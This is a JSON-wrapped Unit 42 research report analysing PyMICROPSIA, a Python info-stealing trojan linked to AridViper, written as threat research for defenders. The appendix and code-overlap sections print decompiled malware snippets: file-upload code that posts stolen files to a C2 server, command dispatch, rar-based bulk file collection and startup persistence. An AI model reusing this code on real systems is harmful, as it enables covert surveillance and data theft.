{
	"id": "d40455fe-12e6-4bde-808b-f57d2c21aa16",
	"created_at": "2026-04-06T00:12:54.833615Z",
	"updated_at": "2026-04-10T03:33:56.451675Z",
	"deleted_at": null,
	"sha1_hash": "0ac687364c7a585bd646624aba51f26db3e8042e",
	"title": "PyMICROPSIA: New Information-Stealing Trojan from AridViper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3304866,
	"plain_text": "PyMICROPSIA: New Information-Stealing Trojan from\r\nAridViper\r\nBy Unit 42\r\nPublished: 2020-12-14 · Archived: 2026-04-05 12:38:42 UTC\r\nExecutive Summary\r\nUnit 42 researchers have been tracking the threat group AridViper, which has been targeting the Middle Eastern\r\nregion. As part of this research, a new information-stealing Trojan with relations to the MICROPSIA malware\r\nfamily has been identified, showing that the actor maintains a very active development profile, creating new\r\nimplants that seek to bypass the defenses of their targets. We have named this new malware family\r\nPyMICROPSIA because it is built with Python.\r\nFigure 1 below provides a high-level overview of the capabilities of the PyMICROPSIA malware family and\r\nsimilarities observed with previous AridViper activity. While investigating PyMICROPSIA capabilities, we\r\nidentified two additional samples hosted in the attacker’s infrastructure, which are downloaded and used by\r\nPyMICROPSIA during its deployment. The additional samples provide persistence and keylogging capabilities,\r\nwhich we discuss later.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 1 of 35\n\nFigure 1. PyMICROPSIA overview.\r\nIn this blog, we will detail the functionality and objectives of PyMICROPSIA and analyze its command and\r\ncontrol (C2) implementation. We will also highlight the main observations that allow us to attribute\r\nPyMICROPSIA to previous AridViper activity.\r\nPalo Alto Networks Next-Generation Firewall customers are protected from the attacks outlined in this blog with\r\nWildFire, URL Filtering and DNS Security subscriptions. Customers are also protected with AutoFocus and\r\nCortex XDR.\r\nPyMICROPSIA Analysis\r\nPyMICROPSIA has a rich set of information-stealing and control capabilities, including:\r\nFile uploading.\r\nPayload downloading and execution.\r\nBrowser credential stealing. Clearing browsing history and profiles.\r\nTaking screenshots.\r\nKeylogging.\r\nCompressing RAR files for stolen information.\r\nCollecting process information and killing processes.\r\nCollecting file listing information.\r\nDeleting files.\r\nRebooting machine.\r\nCollecting Outlook .ost file. Killing and disabling Outlook process.\r\nDeleting, creating, compressing and exfiltrating files and folders.\r\nCollecting information from USB drives, including file exfiltration.\r\nAudio recording.\r\nExecuting commands.\r\nImplementation Overview\r\nPyMICROPSIA is an information-stealing Trojan built with Python and made into a Windows executable using\r\nPyInstaller.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 2 of 35\n\nFigure 2. PyInstaller strings in PyMICROPSIA.\r\nIt implements its main functionality by running a loop, where it initializes different threads and calls several tasks\r\nperiodically with the intent of collecting information and interacting with the C2 operator.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 3 of 35\n\nFigure 3. Main code loop.\r\nThe actor makes use of several interesting Python libraries to achieve its purposes, including both built-in Python\r\nlibraries and specific packages. Some examples of information-stealing specific libraries are:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 4 of 35\n\nPyAudio, for audio stealing capabilities.\r\nmss, for screenshot capabilities.\r\nFigure 4. PyAudio library for audio recording.\r\nFigure 5. mss library for screenshots.\r\nThe usage of Python built-in libraries is expected for multiple purposes, such as interacting with Windows\r\nprocesses, Windows registry, networking, file system and so on.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 5 of 35\n\nFigure 6. Windows Registry interaction.\r\nFigure 7. Windows processes interaction.\r\nFor more specific interactions with the Windows operating system, it makes use of libraries such as:\r\nWMI, for interaction with Windows Management Instrumentation.\r\nwin32security and ntsecuritycon, for interaction with the win32security API.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 6 of 35\n\nFigure 8. WMI usage for USB interaction.\r\nFigure 9. win32security and ntsecuritycon usage.\r\nAn in-depth analysis of the code and capabilities of PyMICROPSIA can be found in the Appendix.\r\nCommand and Control\r\nPyMICROPSIA implements a simple HTTP POST-based C2 protocol, using different Uniform Resource Identifier\r\n(URI) paths and variables during the communication depending on the functionality invoked (full details on the\r\nimplementation can be found in the Appendix).\r\nThe following table summarizes the URI paths and corresponding functionality in PyMICROPSIA:\r\nPath Method\r\n/zoailloaze/sfuxmiibif/samantha Delete request. Unregister.\r\n/zoailloaze/sfuxmiibif/lashawna Device registration.\r\n/zoailloaze/sfuxmiibif/matheny Send command output data.\r\n/zoailloaze/sfuxmiibif/uiasfvz USB device information\r\n/zoailloaze/sfuxmiibif/daryl Delete request.\r\n/zoailloaze/sfuxmiibif/qprbudls Download payload.\r\n/zoailloaze/sfuxmiibif/nyrvoz Download URL.\r\n/zoailloaze/sfuxmiibif/hortense1 Upload file.\r\nTable 1. Main purpose of configuration folders and files.\r\nIt's also important to note that in the PyMICROPSIA samples analyzed, the C2-related code shows several code\r\nbranches that will never be executed when responses are processed, likely because the actor is still actively\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 7 of 35\n\nworking on the code. Based on the code sections that are reachable, the following table summarizes the commands\r\nand actions performed on the victim machine:\r\nCommand Action\r\nLee Register new device.\r\nRenee Delete device.\r\nRapunzel Steal and upload browser credentials to C2.\r\nMulan Collect and upload process list.\r\nSilverman Collect and upload file information in TXT format.\r\nEeyore Delete Firefox profiles and de-register device.\r\nPocahontas Collect and upload compressed file information in JSON detailed format.\r\nInfoCinder Collect and upload information regarding drives in the system.\r\nTable 2. Reachable C2 commands and actions.\r\nIs AridViper Working on New Attack Vectors?\r\nPyMICROPSIA is designed to target Windows operating systems only, but the code contains interesting snippets\r\nchecking for other operating systems, such as “posix” or “darwin”. This is an interesting finding, as we have not\r\nwitnessed AridViper targeting these operating systems before and this could represent a new area the actor is\r\nstarting to explore.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 8 of 35\n\nelse:\r\nif os.name == 'posix' and sys.platform == 'darwin':\r\nPathName = os.getenv('HOME') + '/Library/Application Support/Google/Chrome/Default/'\r\nif os.path.isdir(PathName) == False:\r\nsys.exit(0)\r\nelif os.name == 'posix':\r\nPathName = os.getenv('HOME') + '/.config/google-chrome/Default/'\r\nif os.path.isdir(PathName) == False:\r\nsys.exit(0)\r\nreturn PathName\r\nFor now, the code found is very simple, and could be part of a copy and paste effort when building the Python\r\ncode, but in any case, we plan to keep it on our radar while researching new activity.\r\nAdditional Payloads\r\nDuring the C2 interactions, PyMICROPSIA downloads two additional samples that are dropped and executed on\r\nthe victim’s system, running additional functionality. These payloads are not Python / PyInstaller based.\r\nKeyLogger functionality\r\nThis is a very interesting case, as the keylogging functionality hasn’t been implemented natively as part of\r\nPyMICROPSIA. Instead, the sample downloads a specific payload (see the section on File Download Capabilities\r\nin the Appendix for details on how the payload is downloaded).\r\nThe payload is downloaded with filename “MetroIntelGenericUIFram.exe” and has the following SHA-256:\r\n381b1efca980dd744cb8d36ad44783a35d01a321593a4f39a0cdae9c7eeac52f\r\nThe sample implements keylogging capabilities using the GetAsyncKeyState API method:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 9 of 35\n\nFigure 10. Keylogger GetAsyncKey() code.\r\nIt has a hardcoded configuration directly related to the directory structure initialized by the main PyMICROPSIA\r\nsample, so it needs to be compiled according to it. It needs to run under a specific directory created by\r\nPyMICROPSIA (“ModelsControllerLibb”), and will store keystroke information under the\r\n“HPFusionManagerDell” folder.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 10 of 35\n\nFigure 11. Hardcoded configuration parameters.\r\nThe keylogger drops information into the HPFusionManagerDell directory with the following filename structure\r\nand format:\r\nFigure 12. Keylogger output file format.\r\nFigure 13. Keylogger file content structure.\r\nPersistence\r\nPersistence in this malware sample can be achieved via regular methods, such as setting up registry keys, which is\r\ndone as part of the Python code as follows:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 11 of 35\n\nFigure 14. Registry key persistence.\r\nHowever, there is something interesting about persistence in this implementation. The sample downloads another\r\npayload from the C2 server (see the File Download Capabilities section for more details). This payload is named\r\n“SynLocSynMomentum.exe”, with the following SHA-256:\r\n9c32fdf5af8b86049abd92561b3d281cb9aebf57d2dfef8cc2da59df82dca753\r\nThe sample is executed with specific parameters:\r\nSynLocSynMomentum.exe ModelsControllerLibb ModelsControllerLib\r\nIt sets up persistence via the shortcut .lnk copied to the startup menu. It's striking that this code is run as a separate\r\npayload considering the amount of functionality already present in the Python code.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c move\r\n\"C:\\Users\\admin\\AppData\\Local\\Temp\\\\ModelsControllerLib.lnk\"\r\n\"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\ModelsControllerLib.lnk\"\r\nRelations With Other MICROPSIA Activity\r\nWe unearthed PyMICROPSIA while investigating recent MICROPSIA activity related to the Middle Eastern\r\nregion, and there are multiple aspects of the malware that link the activity to AridViper, including the following\r\nexamples.\r\nCode Overlaps\r\nOne of the first things that caught our attention regarding this sample was the C2 implementation and capabilities,\r\nwhich are quite similar to known MICROPSIA samples. For example, see the C2 descriptions in previous research\r\nby Radware and Check Point.\r\nAlso, one of the tactics, techniques and procedures (TTPs) observed across MICROPSIA samples is the use of\r\nrar.exe to compress data for exfiltration. In this version, rar.exe is downloaded from the C2 infrastructure and used\r\nwith very similar parameters as observed in previous samples:\r\nk24 = '\"' + Wv + '\\\\*.dot' + '\" '\r\nk25 = '\"' + Wv + '\\\\*.dotx' + '\" '\r\nAllFile = k1 + k2 + k3 + k4 + k5 + k6 + k7 + k8 + k9 + k11 + k12 + k13 + k14 + k15 + k16 + k17 + k18 +\r\nk19 + k20 + k21 + k22 + k23 + k24 + k25\r\nAllFiles_Drvi = AllFile\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 12 of 35\n\nflTDType = AllFiles_Drvi\r\nte = file_D\r\nEn_crpypt2 = 'a -r -ep1 -v2.5m -ta' + te + ' -hp'\r\nEn = '4545933464930447517744759'\r\nmm = chick_Device_Name() + En\r\nnnWithoutdel = En_crpypt2 + mm\r\nsubprocess.call('\"' + Rar_File + '\"' + ' ' + (nnWithoutdel + ' ' + '\"' + Zip_File2 + '_NETWORKWTHDate\"'\r\n+ ' ' + flTDType), shell=True)\r\nFor example, see how one recent sample of MICROPSIA makes use of rar.exe.\r\nSHA-256: 3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac\r\n\"C:\\Program Files\\WinRAR\\Rar.exe\" a -r -ep1 -v2500k -\r\nhpcec6b597e046386f74b807c60ada61a5_d01247a1eaf1c24ffbc851e883e67f9b -ta2020-10-21\r\n\"C:\\ProgramData\\commonlogfiles\\LMth_C\" \"C:\\Users\\admin\\*.xls\" \"C:\\Users\\admin\\*.xlsx\"\r\n\"C:\\Users\\admin\\*.doc\" \"C:\\Users\\admin\\*.docx\" \"C:\\Users\\admin\\*.csv\" \"C:\\Users\\admin\\*.pdf\"\r\n\"C:\\Users\\admin\\*.ppt\" \"C:\\Users\\admin\\*.pptx\" \"C:\\Users\\admin\\*.odt\" \"C:\\Users\\admin\\*.mdb\"\r\n\"C:\\Users\\admin\\*.accdb\" \"C:\\Users\\admin\\*.accde\" \"C:\\Users\\admin\\*.txt\" \"C:\\Users\\admin\\*.rtf\"\r\nC2 Communication Similarity\r\nThe URI path structures observed in multiple MICROPSIA samples follow a similar structure to the ones in the\r\nPyMICROPSIA samples. For example, if we look into the same recent MICROPSIA sample, we can observe the\r\nrandom characters and structure of the URI paths.\r\nSHA-256:\r\n3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac\r\nhxxps://jaime-martinez[.]info/sujqbrgpb/bztjpskd/rxkwjt\r\nhxxps://jaime-martinez[.]info/sujqbrgpb/bztjpskd/zxfsyadoss/gM69sY\r\nhxxp://jaime-martinez[.]info/sujqbrgpb/bztjpskd/tpmpyyzwg\r\nhxxps://jaime-martinez[.]info/sujqbrgpb/bztjpskd/ouwmhf/ImoOEJ\r\nhxxp://jaime-martinez[.]info/sujqbrgpb/bztjpskd/ouwmhf/voT8FY\r\nhxxp://jaime-martinez[.]info/sujqbrgpb/bztjpskd/rxkwjt\r\nhxxp://jaime-martinez[.]info/sujqbrgpb/bztjpskd/zxfsyadoss/TocLI5\r\nhxxps://jaime-martinez[.]info/sujqbrgpb/bztjpskd/ouwmhf/9WnKfe\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 13 of 35\n\nhxxp://jaime-martinez[.]info/sujqbrgpb/bztjpskd/zxfsyadoss/pyPaqj\r\nhxxps://jaime-martinez[.]info/sujqbrgpb/bztjpskd/ouwmhf/HRabCX\r\nThemes Used\r\nIn the past, we have seen references in MICROPSIA to specific themes when it comes to code and C2\r\nimplementation, such as The Big Bang Theory or Game of Thrones, and this new implementation is not different,\r\nincluding multiple references to multiple famous actor names, both in code variables as well as in infrastructure\r\nused, as can be seen in Figures 15 and 16.\r\nFigure 15. MICROPSIA is known for referencing themes in code, such as The Big Bang Theory and\r\nGame of Thrones. The reference to the actor Fran Drescher shown above seems in line with\r\nprevious observations of themes.\r\nFigure 16. MICROPSIA is known for referencing themes in code, such as The Big Bang Theory and\r\nGame of Thrones. The reference to the actor Keanu Reeves shown above seems in line with\r\nprevious observations of themes.\r\nAlso, as described in the Command and Control section, the C2 operations contain a lot of Disney references.\r\nAnother interesting detail is the presence of Arabic comments in the code:\r\n('..!!لم يتم ضغط هذا الملف')Error_Request_Delete\r\nThis could be a false flag, but it is another possible link to the regional attribution of this malware sample.\r\nConclusion\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 14 of 35\n\nAridViper is an active threat group that continues developing new tools as part of their arsenal. PyMICROPSIA\r\nshows multiple overlaps with other existing AridViper tools such as MICROPSIA. Also, based on different\r\naspects of PyMICROPSIA that we analyzed, several sections of the malware are still not used, indicating that it is\r\nlikely a malware family under active development by this actor.\r\nPalo Alto Networks customers are protected from the attacks outlined in this blog in the following ways:\r\nAll known AridViper tools, including MICROPSIA and PyMICROPSIA, have malicious verdicts in\r\nWildFire.\r\nAutoFocus customers can track the AridViper actor and its tools.\r\nCortex XDR blocks both PyMICROPSIA and the dropped payloads.\r\nC2 domains have been categorized as Command and Control in URL Filtering and DNS Security.\r\nIndicators of Compromise\r\nPyMICROPSIA Samples\r\n11487246a864ee0edf2c05c5f1489558632fb05536d6a599558853640df8cd78\r\nddaeffb12a944a5f4d47b28affe97c1bc3a613dab32e5b5b426ef249cfc29273\r\n46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531\r\nMICROPSIA Samples\r\n47d53f4ab24632bf4ca34e9a10e11b4b6c48a242cbcfcb1579d67523463e59d2\r\n83e0db0fa3feaf911a18c1e2076cc40ba17a185e61623a9759991deeca551d8b\r\neab20d4c0eeff48e7e1b6b59d79cd169cac277aeb5f91f462f838fcd6835e0ac\r\n078212fc6d69641e96ed04352fba4d028fd5eadc87c7a4169bfbcfc52b8ef8f2\r\n0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd\r\n2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c\r\n26253e9027f798bafc4a70bef1b5062f096a72b0d7af3065b0f4a9b3be937c99\r\n3884ac554dcd58c871a4e55900f8847c9e308a79c321ae46ced58daa00d82ab4\r\n3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac\r\n3da95f33b6feb5dcc86d15e2a31e211e031efa2e96792ce9c459b6b769ffd6a4\r\n42fa99e574b8ac5eddf084a37ef891ee4d16742ace9037cda3cdf037678e7512\r\n4eced949a2da569ee9c4e536283dabad49e2f41371b6e8d40b80a79ec1b0e986\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 15 of 35\n\n5b8b71d1140beaae4736eb58adc64930613ebeab997506fbb09aabff68242e17\r\n82ad34384fd3b37f85e735a849b033326d8ce907155f5ff2d24318b1616b2950\r\na60cadbf6f5ef8a2cbb699b6d7f072245c8b697bbad5c8639bca9bb55f57ae65\r\nb0562b41552a2fa744390a5f79a843940dade57fcf90cd23187d9c757dc32c37\r\nb61fa79c6e8bfcb96f6e2ed4057f5a835a299e9e13e4c6893c3c3309e31cad44\r\nd28ab0b04dc32f1924f1e50a5cf864325c901e11828200629687cca8ce6b2d5a\r\ndb1c2482063299ba5b1d5001a4e69e59f6cc91b64d24135c296ec194b2cab57a\r\ne869c7f981256ddb7aa1c187a081c46fed541722fa5668a7d90ff8d6b81c1db6\r\neda6d901c7d94cbd1c827dfa7c518685b611de85f4708a6701fcbf1a3f101768\r\nAridViper Infrastructure\r\nbaldwin-gonzalez[.]live\r\njaime-martinez[.]info\r\njudystevenson[.]info\r\nrobert-keegan[.]life\r\nbenyallen[.]club\r\nchad-jessie[.]info\r\nescanor[.]live\r\nkrasil-anthony[.]icu\r\nnicoledotson[.]icu\r\nsamwinchester[.]club\r\ntatsumifoughtogre[.]club\r\nAPPENDIX: PyMYCROPSIA Malware Analysis\r\nThe following PyMICROPSIA analysis is based on the following sample:\r\nSHA-256: 46dae9b27f100703acf5b9fda2d1b063cca2af0d4abeeccc6cd45d12be919531\r\nMalware Initialization\r\nEnvironment and Configuration\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 16 of 35\n\nAs part of the malware initialization, it's important to highlight two main aspects of PyMICROPSIA:\r\nCreates multiple folders with different purposes.\r\nDefines a list of C2 servers.\r\nFigure 17. Directory structure during initialization.\r\nThe main purpose for each of the files and folders defined in the initial malware configuration is summarized in\r\nthe following table:\r\nDirectory Purpose\r\nRar_com_Folder Storage for RAR compressed information.\r\nDevName Storage for RAR compressed information.\r\nDevNameSound Storage for audio recorded files.\r\nDevNameKeyPress Storage for keylogger output information.\r\nMyFolderName Multipurpose folder. Stores configuration, output with information collected, etc.\r\ndownloadNameApp Filename for applications downloaded from the C2.\r\nNameApps Filename for applications downloaded from the C2.\r\nNameAppShurt Filename for shortcut created for persistence.\r\nTable 3. Main purpose of configuration folders and files.\r\nDevice Identifier\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 17 of 35\n\nDevices are identified based on a combination of computer name, username and a randomly generated code. Once\r\nthe code is generated, it’s stored under the multipurpose folder “MyFolderName”.\r\nFigure 18. Initialization of device name.\r\nThis identifier function will be used during C2 communications to keep track of the target.\r\nC2 Selection\r\nFrom a network perspective, the malware picks up a C2 server from the configured list based on a connectivity\r\ntest via a POST request to a specific path:\r\nFigure 19. Network C2 selection.\r\nIt then stores the resulting selected domain under the “MyFolderName” multipurpose folder.\r\nFigure 20. Selected domain configuration storage.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 18 of 35\n\nMain Activity Loop\r\nOnce the initial setup is complete, the malware capabilities start by entering into a loop (see Figure 3) where:\r\nSeveral independent threads for audio recording and file uploading are started.\r\nSpecific tasks are run periodically, covering the following main areas: persistence, keylogging, screenshots\r\nand interaction with the C2 operator.\r\nC2 Implementation\r\nProtocol Implementation\r\nThe protocol implemented is simple. Messages are sent via HTTP POST requests, using different URI paths and\r\nvariables depending on the functionality invoked.\r\nFor example, when a file is uploaded, an HTTP POST request is built as follows:\r\ndef Upload_File(type, path, FranDrescher, NB):\r\nif not os.path.exists(path):\r\nreturn True\r\nurl = FranDrescher + '/zoailloaze/sfuxmiibif/hortense1'\r\ndatei_hochladen = open(path, 'rb')\r\nfiles = {'terrell': datei_hochladen}\r\nstatus = False\r\nwhile not status:\r\ntry:\r\nur = requests.post(url, files=files, data={'beau': name_device + ';' + str(NB),  'type': type,  'FComp':\r\nstr(NumComPers())})\r\nif ur.text == 'true':\r\nstatus = True\r\ndatei_hochladen.close()\r\nos.remove(path)\r\nThis request contains:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 19 of 35\n\nURI Path: '/zoailloaze/sfuxmiibif/hortense1'\r\nMultipart encoded files, under “terrel” variable.\r\nForm-encoded data, using ‘beau’, ‘type’ and ‘FComp’ variables.\r\nSome parameters can contain multiple components, such as ‘beau’ in this case, and they are split with the\r\nuse of ‘;’.\r\nWhen responses are received, if they contain operations to execute, they are sent via strings with components split\r\nwith ‘;’ as delimiter. For example, the following code snippet shows the communication with the C2 operator and\r\nhow it treats the response (only some interesting portions are shown for brevity):\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\nur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\n   resArr = ur.text\r\n   Im_extin = resArr.split(';')[0]\r\n   if ur.status_code == 200:\r\n       if resArr == 'Lee':\r\n           register_new_device(FranDrescher)\r\n       elif resArr == 'Melissa':\r\n           pass\r\n       elif resArr == 'Renee':\r\n           status = Delete_Request(Im_extin)\r\n       elif resArr == 'nero':\r\n           pass\r\n  else:\r\n           Im_extintion = resArr.split(';')[1]\r\n           if Im_extintion == 'Rapunzel':\r\n               path = args_parser(MyFolderName)\r\n               status = Upload_File('else', path, FranDrescher, Im_extin)\r\n               if status:\r\n                   status = Delete_Request(Im_extin)\r\n               if Im_extintion == 'Gal_Gadot':\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 20 of 35\n\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n                   path = Sec_Shot(MyFolderName)\r\n                   status = Upload_File('lucretia', path, FranDrescher, Im_extin)\r\n                   if status:\r\n                       status = Delete_Request(Im_extin)\r\n...\r\n...\r\n...\r\nif Im_extintion == 'Ed_ONeill':\r\n                   F_Out = resArr.split(';')[2]\r\n                   src_B = base64ToString(F_Out)\r\n                   if src_B == 'delete':\r\n                       status = Del_Outlook()\r\n                   else:\r\n...\r\n...\r\n...\r\nif Im_extintion == 'groot':\r\n                   src_path = resArr.split(';')[2]\r\n                   dist_path = resArr.split(';')[3]\r\n                   src_B = base64ToString(src_path)\r\n                   src_B_D = base64ToString(dist_path)\r\n                   if os.path.exists(src_B) and os.path.exists(src_B_D\r\nThe response is split via ‘;’ delimiter, and depending on the position, contains parameters that can be received in\r\nplain text or encoded in base64, depending on each situation.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 21 of 35\n\nThe following table summarizes the paths and parameters used during the C2 interactions and their functionality:\r\nPath Method Variables\r\n/zoailloaze/sfuxmiibif/samantha Delete request. Unregister. beau\r\n/zoailloaze/sfuxmiibif/lashawna Device registration. beau\r\n/zoailloaze/sfuxmiibif/matheny Send command output data. beau, terrel\r\n/zoailloaze/sfuxmiibif/uiasfvz USB device information beau, type\r\n/zoailloaze/sfuxmiibif/daryl Delete request. arturo, beau\r\n/zoailloaze/sfuxmiibif/qprbudls Download payload. beau\r\n/zoailloaze/sfuxmiibif/nyrvoz Download URL. beau\r\n/zoailloaze/sfuxmiibif/hortense1 Upload file. beau, type, FComp, terrel\r\nTable 4. Paths and parameters used during C2 interactions and their functionality..\r\nInteracting with C2 Operator\r\nBased on the main activity loop, there will be a periodic call to the C2 server, and it will begin by sending\r\ninformation regarding the device (device identifier), as well as the last modified time in disk.\r\ndef Chick_Request():\r\n   global FranDrescher\r\n   global WD\r\n   global Wv\r\n   url = FranDrescher + '/zoailloaze/sfuxmiibif/lashawna'\r\n   ur = requests.post(url, data={'beau': name_device + ';' + str(getLastModDir(4))})\r\n   resArr = ur.text\r\n   Im_extin = resArr.split(';')[0]\r\nIt's interesting to see how this captures the latest disk activity date. The code shows that it is incomplete, as in this\r\ncase, the type is ‘4’, and it will always return the string ‘empty’ instead of any kind of date:\r\n1 def getLastModDir(type):\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 22 of 35\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n   try:\r\n       c = wmi.WMI()\r\n       Mv = ''\r\n       for drive in c.Win32_LogicalDisk(DriveType=type):\r\n           Mv = drive.Caption\r\n       last_date = ''\r\n       dirpath = Mv\r\n       entries = (os.path.join(dirpath, fn) for fn in os.listdir(dirpath))\r\n       entries = ((os.stat(path), path) for path in entries)\r\n       entries = ((stat[ST_MTIME], path) for stat, path in entries if S_ISREG(stat[ST_MODE]))\r\n       for cdate, path in entries:\r\n           last_date = datetime.datetime.fromtimestamp(cdate)\r\n       if type == 4:\r\n           return 'empty'\r\n       return last_date\r\n   except Exception as e:\r\n       return 'empty'\r\nThere are several examples of implementations like this across the code, which show an incomplete or ongoing\r\nimplementation, which is a signal that the sample is still under active development by the actor.\r\nAs we mentioned before, the response string is split by its delimiter and the commands and encoded parameters\r\nsent by the C2 operator are parsed. As an interesting fact, the commands are full of references to Disney (in the\r\npast, we have seen AridViper using variables referencing characters of The Big Bang Theory or Game of Thrones,\r\nfor example).\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 23 of 35\n\nFigure 21. C2 commands example.\r\nAnother interesting example of incomplete code is the fact that the code won’t be able to go through all the\r\npossible branches and functionality in the C2 implementation. For example, in the following code snippet, if the\r\ncode enters into the “Mulan” branch, it won’t enter into the “Vanellope” code block:\r\n1\r\n2\r\nif Im_extintion == 'Mulan':\r\n    path = Process_list(MyFolderName)\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 24 of 35\n\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n    status = Upload_File('else', path, FranDrescher, Im_extin)\r\n    if status:\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Mulan_Fire':\r\n        K_process('firefox.exe')\r\n        Compress_File_Rar_WithoutDel2()\r\n        status = Delete_Request(Im_extin)\r\n    if Im_extintion == 'Vanellope':\r\n        path = Get_ImgType(MyFolderName)\r\n        status = Upload_File('else', path, FranDrescher, Im_extin)\r\n        if status:\r\n            status = Delete_Request(Im_extin)\r\n        if Im_extintion == 'Calhoun':\r\n            path = Get_VedioType(MyFolderName)\r\n            status = Upload_File('else', path, FranDrescher, Im_extin)\r\n            if status:\r\n                status = Delete_Request(Im_extin)\r\nThis is another signal of incomplete implementation and possible active development.\r\nA summary of the commands that are reachable by code execution has been provided in Table 2.\r\nInformation-Stealing and Control Capabilities\r\nThis malware sample has a rich set of information-stealing and control capabilities, whether they’re reachable in\r\nthe current C2 implementation or not. The following sections will detail some of the most relevant capabilities\r\nonly, in order to provide visibility into how this malware family is implemented.\r\nAudio Recording\r\nAudio recording is achieved with the usage of the pyaudio and wave Python libraries. Data is stored under the\r\n“DevNameSound” folder.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 25 of 35\n\nFigure 22. Audio recording implementation.\r\nThe recordings are stored in the corresponding folder, and the running threads as well as the operator commands\r\nwill allow for the retrieval of the information captured.\r\nFile Download Capabilities\r\nThe ability to download files from the C2 is implemented via a POST request to the following URL path:\r\n/zoailloaze/sfuxmiibif/qprbudls\r\nAs part of the POST request, a parameter named “beau” will be used to specify the type of file download. Based\r\non its value, it can download specific payloads as well as given URLs. The code looks as follows:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 26 of 35\n\nFigure 23. Download code example.\r\nValue of “beau” Action\r\n‘1’ Download a legit version or rar.exe.\r\n‘2’ Download MetroIntelGenericUIFram.exe.\r\n‘3’ Download SynLocSynMomentum.exe.\r\nA given URL Download from any specified URL.\r\nTable 5. Values of “beau” for sample download.\r\nFile Uploading\r\nThe malware sample starts threads that will periodically upload compressed samples located in different folders.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 27 of 35\n\nFigure 24. Upload threads initialized by the sample.\r\nFile uploads are performed via POST request to the following path:\r\n/zoailloaze/sfuxmiibif/hortense1\r\nData is specified via a POST parameter, “beau”, that can contain several variables, always delimited with “;”.\r\nFiles are specified with a POST parameter named “terrel”.\r\nBoth the mentioned threads, as well as the operators via C2 interaction, can invoke upload code. Here is one\r\nexample of such a method, where the implementation can be observed:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 28 of 35\n\nFigure 25. Upload method example.\r\nScreenshot Capabilities\r\nScreenshots are sent to the C2 using Python’s mss library both periodically as well as on demand if the C2\r\noperator sends the appropriate command.\r\nFigure 26. Screenshot capabilities.\r\nFile Gathering Information\r\nThroughout the code, multiple methods oriented toward collecting information can be found. The methods are\r\ninvoked based on different interactions with the C2 operator, and they give the operators flexibility on what kind\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 29 of 35\n\nof information they want to collect.\r\nFor example, there are generic methods to collect specific folders and with different levels of information detailed,\r\nas can be seen in several of the figures below.\r\nFigure 27. Collection of samples under C:\\users and C:\\Documents and Settings.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 30 of 35\n\nFigure 28. Detailed collection of samples under several folders of interest in JSON format.\r\nThere are methods to collect information from external drives:\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 31 of 35\n\nFigure 29. Example of USB information collection.\r\nAs well as other approaches, such as methods to focus on specific file extensions.\r\nhttps://unit42.paloaltonetworks.com/pymicropsia/\r\nPage 32 of 35\n\nFigure 30. Example of collection of file information by specific extension type.\r\nFile 